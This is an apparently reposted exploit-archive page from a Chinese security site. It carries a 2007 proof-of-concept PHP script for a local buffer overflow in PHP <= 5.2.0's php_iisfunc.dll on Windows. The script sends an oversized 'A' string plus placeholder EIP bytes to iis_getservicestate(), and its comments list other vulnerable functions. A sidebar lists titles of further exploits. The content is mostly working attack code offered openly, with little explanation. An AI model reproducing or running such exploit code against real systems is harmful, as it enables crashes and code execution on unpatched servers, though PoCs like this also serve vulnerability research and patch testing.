PHP <= 5.2.0 (php_iisfunc.dll) Local Buffer Overflow PoC (win32)

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

PHP <= 5.2.0 (php_iisfunc.dll) Local Buffer Overflow PoC (win32)

来源：boecke@herzeleid.net 作者：boecke 发布时间：2007-08-28

<?php
// ==================================================================================
//
// php_iisfunc.dll PHP <= 5.2.0 (win32) Buffer Overflow PoC
//
//      Discovery: boecke <boecke@herzeleid.net>
//      Risk: Local Buffer Overflow (Medium - High Risk)
//      Notes: Various other functions are exploitable, all of which convert the
//      string argument(s) to unicode.
//
//      extern "C" IISFUNC_API int fnStartService(LPCTSTR ServiceId);
//      extern "C" IISFUNC_API int fnGetServiceState(LPCTSTR ServiceId);
//      extern "C" IISFUNC_API int fnStopService(LPCTSTR ServiceId);
//
//      "Sangre, sonando, de rabia naci.. Who do you trust?"
//       - Cygnus, Vismund Cygnus: Sarcophagi
//
// ==================================================================================

if ( !extension_loaded( "iisfunc" ) )
{
       die( "Extension not loaded.\n" );
}

$buf_unicode = str_repeat( "A", 256 );
$eip_unicode = "\x41\x41";

iis_getservicestate( $buf_unicode . $eip_unicode );

?>

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告